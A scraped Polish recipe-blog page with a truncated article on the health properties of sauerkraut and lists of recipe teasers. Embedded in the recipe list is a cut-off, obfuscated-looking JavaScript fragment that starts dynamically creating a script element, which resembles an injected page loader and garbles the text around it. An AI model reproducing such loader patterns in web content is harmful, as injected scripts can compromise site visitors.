KUCHENNA APTEKA #23 - KAPUSTA KISZONA
Źródło: https://www.kuchniamagdaleny.pl/2019/02/kuchenna-apteka-23-kapusta-kiszona.html
Kapusta kiszona w kuchni polskiej gosci od bardzo dawna i stanowi podstawe wielu tradycyjnych dan. Jednak warto miec tez na uwadze, ze ta zwykla kiszona kapusta, ktora znamy od dziecka ma wiele wlasciwosci zdrowotnych, bo to bogactwo witamin i mineralow.Powstaje ona w procesie fermentacji mlekowej, podczas ktorej cukry zawarte w kapuscie przeksztalcane sa w kwas mlekowy, ktory jest naturalnym zwia...
Najnowsze przepisy
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 14
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 17
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 19
Pyszny przepis na noodle z mięsem mielonym. Szybki,... ⇖ 19
Wyobraź sobie ten moment: wyjmujesz z piekarnika idealną... ⇖ 11
Przepisy z bloga
Ciasta to doskonały wybór na popołudniowy podwieczorek,... ⇖ 62
Gotowanie na parze jest powszechnie uznawane za jedną z... ⇖ 118
Praktycznie każda mama doskonale wie o tym, jak trudno... ⇖ 203
Słoiki na przetwory można znaleźć w sklepach w okresie... ⇖ 254
Maj to dopiero początek sezonu na przetwory, ale już... ⇖ 359
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 348
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 261
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 205
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 166
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 166
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 149
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 67
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 64









































